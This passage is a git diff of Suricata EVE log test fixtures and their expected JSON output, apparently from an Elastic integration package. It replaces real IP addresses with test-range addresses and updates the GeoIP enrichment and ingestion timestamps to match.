@@ -1341,7 +1337,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0044:041d:0000:0000:0000:0003", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1371,7 +1367,7 @@ }, "related": { "ip": [ - "2001:4998:0044:041d:0000:0000:0000:0003", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1380,7 +1376,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0044:041d:0000:0000:0000:0003", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1392,8 +1388,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853486Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0044:041d:0000:0000:0000:0003\"}}", + "ingested": "2021-12-09T13:45:26.597980400Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1412,7 +1408,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0058:1836:0000:0000:0000:0011" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", 
@@ -1422,7 +1418,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0058:1836:0000:0000:0000:0011", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1452,7 +1448,7 @@ }, "related": { "ip": [ - "2001:4998:0058:1836:0000:0000:0000:0011", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1461,7 +1457,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0058:1836:0000:0000:0000:0011", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1473,8 +1469,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853489400Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0058:1836:0000:0000:0000:0011\"}}", + "ingested": "2021-12-09T13:45:26.597986200Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1493,7 +1489,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0044:041d:0000:0000:0000:0004" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", 
@@ -1503,7 +1499,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0044:041d:0000:0000:0000:0004", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1533,7 +1529,7 @@ }, "related": { "ip": [ - "2001:4998:0044:041d:0000:0000:0000:0004", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1542,7 +1538,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0044:041d:0000:0000:0000:0004", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1554,8 +1550,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853493300Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0044:041d:0000:0000:0000:0004\"}}", + "ingested": "2021-12-09T13:45:26.598007600Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], 
@@ -1618,7 +1614,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853497100Z", + "ingested": "2021-12-09T13:45:26.598013Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578089+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":48288,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":9104,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" @@ -1682,7 +1678,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853500700Z", + "ingested": "2021-12-09T13:45:26.598017400Z", "original": "{\"timestamp\":\"2019-08-23T02:03:36.578262+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":59203,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":12859,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -1702,10 +1698,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", - "151.101.130.217" + "175.16.199.1", + "175.16.199.1", + "175.16.199.1", + "175.16.199.1" ], "question": { "name": "www.elastic.co", @@ -1723,25 +1719,25 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.194.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.2.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.66.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.130.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 } @@ -1771,10 +1767,7 @@ }, "related": { "ip": [ - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", - "151.101.130.217", + "175.16.199.1", "10.0.2.3" ] }, 
@@ -1793,8 +1786,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853518400Z", - "original": "{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.194.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.2.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.66.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.130.217\"}]}}", + "ingested": "2021-12-09T13:45:26.598022800Z", + "original": 
"{\"timestamp\":\"2019-08-23T02:03:36.619381+0000\",\"flow_id\":2181951993205289,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":48288,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":9104,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":150,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}]}}", "category": [ "network" ], @@ -1813,10 +1806,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729", - "2a04:4e42:0600:0000:0000:0000:0000:0729" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "name": "www.elastic.co", @@ -1834,7 +1827,7 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0000:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, @@ -1852,7 +1845,7 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0600:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 } 
@@ -1882,10 +1875,9 @@
 },
 "related": {
 "ip": [
- "2a04:4e42:0000:0000:0000:0000:0000:0729",
+ "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "2a04:4e42:0200:0000:0000:0000:0000:0729",
 "2a04:4e42:0400:0000:0000:0000:0000:0729",
- "2a04:4e42:0600:0000:0000:0000:0000:0729",
 "10.0.2.3"
 ]
 },
@@ -1904,8 +1896,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853524400Z", - "original": "{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0000:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0600:0000:0000:0000:0000:0729\"}]}}", + "ingested": "2021-12-09T13:45:26.598028100Z", + "original": 
"{\"timestamp\":\"2019-08-23T02:03:36.626559+0000\",\"flow_id\":928596784370390,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":59203,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":12859,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":269,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}]}}", "category": [ "network" ], diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log index 8c8eb1eca60..d900dbcd4a0 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log 
@@ -1 +1 @@ -{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"52.222.141.99","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} \ No newline at end of file +{"timestamp":"2021-01-27T01:28:11.488362+0100","flow_id":1805461738637437,"in_iface":"enp6s0","event_type":"alert","src_ip":"175.16.199.1","src_port":80,"dest_ip":"10.31.64.240","dest_port":47592,"proto":"TCP","ether":{"src_mac":"00:03:2d:3f:e5:63","dest_mac":"00:1b:17:00:01:18"},"alert":{"action":"allowed","gid":1,"signature_id":2100498,"rev":7,"signature":"GPL ATTACK_RESPONSE id check returned root","category":"Potentially Bad 
Traffic","severity":2,"metadata":{"protocols":["tcp","smtp"],"mitre_attack":["t1190"],"cvss_v2_temporal":["7.9"],"cve":["2019-91325"],"cvss_v3_temporal":["7.1"],"attack_target":["smtp-server","server"],"cvss_v2_base":["8.1"],"rule_source":["acme-rule-factory"],"priority":["medium"],"filename":["exploit.rules"],"updated_at":["2019-06-11"],"capec_id":["248"],"created_at":["2019-06-01"],"hostile":["src_ip"],"cvss_v3_base":["7.3"],"cwe_id":["20"]}},"http":{"hostname":"testmynids.org","url":"/uid/index.html","http_user_agent":"curl/7.58.0","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":200,"length":39},"app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":496,"bytes_toclient":876,"start":"2021-01-22T23:28:38.673917+0100"}} \ No newline at end of file diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json index 8f2d5ed5c4a..9d0d9645126 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-metadata.log-expected.json @@ -16,21 +16,26 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "52.222.141.99", + "address": "175.16.199.1", "port": 80, "bytes": 496, - "ip": "52.222.141.99", + "ip": "175.16.199.1", "mac": "00:03:2d:3f:e5:63", "packets": 6 }, 
@@ -63,7 +68,7 @@
 "testmynids.org"
 ],
 "ip": [
- "52.222.141.99"
+ "175.16.199.1"
 ]
 },
 "http": {
@@ -146,8 +151,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-05T10:52:45.879863300Z", - "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"52.222.141.99\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", + "ingested": "2021-12-09T13:45:29.262566900Z", + "original": 
"{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"protocols\":[\"tcp\",\"smtp\"],\"mitre_attack\":[\"t1190\"],\"cvss_v2_temporal\":[\"7.9\"],\"cve\":[\"2019-91325\"],\"cvss_v3_temporal\":[\"7.1\"],\"attack_target\":[\"smtp-server\",\"server\"],\"cvss_v2_base\":[\"8.1\"],\"rule_source\":[\"acme-rule-factory\"],\"priority\":[\"medium\"],\"filename\":[\"exploit.rules\"],\"updated_at\":[\"2019-06-11\"],\"capec_id\":[\"248\"],\"created_at\":[\"2019-06-01\"],\"hostile\":[\"src_ip\"],\"cvss_v3_base\":[\"7.3\"],\"cwe_id\":[\"20\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "start": "2021-01-22T22:28:38.673Z", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log index 9cc157a9e75..bf46d429aa4 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-small.log 
@@ -2,7 +2,7 @@ {"timestamp":"2018-07-05T15:07:20.910626-0400","flow_id":904992230150281,"in_iface":"en0","event_type":"alert","src_ip":"192.168.86.85","src_port":55641,"dest_ip":"192.168.156.70","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2024833,"rev":3,"signature":"ET POLICY Observed IP Lookup Domain (l2 .io in TLS SNI)","category":"Potential Corporate Privacy Violation","severity":1},"tls":{"session_resumed":true,"sni":"l2.io","version":"TLS 1.2"},"app_proto":"tls","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":793,"bytes_toclient":343,"start":"2018-07-05T15:07:19.659593-0400"}} {"timestamp":"2018-07-05T15:43:47.690014-0400","flow_id":2115002772430095,"in_iface":"en0","event_type":"http","src_ip":"192.168.86.85","src_port":56119,"dest_ip":"192.168.86.28","dest_port":63963,"proto":"TCP","tx_id":0,"http":{"hostname":"192.168.86.28","url":"\/dd.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 Safari\/537.36","http_content_type":"text\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1155}} {"timestamp":"2018-07-05T15:44:33.222441-0400","flow_id":2211411903323127,"in_iface":"en0","event_type":"fileinfo","src_ip":"192.168.86.28","src_port":8008,"dest_ip":"192.168.86.85","dest_port":56118,"proto":"TCP","http":{"hostname":"192.168.86.28","url":"\/ssdp\/device-desc.xml","http_user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.99 
Safari\/537.36","http_content_type":"application\/xml","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1071},"app_proto":"http","fileinfo":{"filename":"\/ssdp\/device-desc.xml","gaps":false,"state":"CLOSED","md5":"427b7337ff37eeb24d74f47d8e04cf21","sha1":"313573490192c685e9e53abef25453ed0d5e2aee","sha256":"f610428ebddf6f8cf9e39322e672583c45fcdcf885efad0ab48fd53a3dfc2c4b","stored":false,"size":1071,"tx_id":0}} -{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"172.217.13.110"}} +{"timestamp":"2018-07-05T15:51:20.213418-0400","flow_id":1684780223079543,"in_iface":"en0","event_type":"dns","src_ip":"192.168.86.1","src_port":53,"dest_ip":"192.168.86.85","dest_port":39464,"proto":"UDP","dns":{"type":"answer","id":12308,"rcode":"NOERROR","rrname":"clients.l.google.com","rrtype":"A","ttl":299,"rdata":"175.16.199.1"}} 
{"timestamp":"2018-07-05T15:51:23.009510-0400","event_type":"stats","stats":{"uptime":5400,"capture":{"kernel_packets":430313,"kernel_drops":0,"kernel_ifdrops":0},"decoder":{"pkts":430313,"bytes":335138381,"invalid":2,"ipv4":425873,"ipv6":3785,"ethernet":430313,"raw":0,"null":0,"sll":0,"tcp":370093,"udp":58337,"sctp":0,"icmpv4":186,"icmpv6":1019,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"ieee8021ah":0,"teredo":1,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":778,"max_pkt_size":1514,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"tcp":1113,"udp":1881,"icmpv4":0,"icmpv6":677,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":11537312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":842,"ssn_memcap_drop":0,"pseudo":0,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":1138,"synack":656,"rst":1165,"segment_memcap_drop":0,"stream_depth_reached":63,"reassembly_gap":0,"overlap":5979,"overlap_diff_data":0,"insert_data_normal_fail":0,"insert_data_overlap_fail":0,"insert_list_fail":0,"memuse":4587520,"reassembly_memuse":768000},"detect":{"alert":2},"app_layer":{"flow":{"http":22,"ftp":0,"smtp":0,"tls":560,"ssh":4,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":2,"dcerpc_udp":0,"dns_udp":762,"failed_udp":1119},"tx":{"http":25,"ft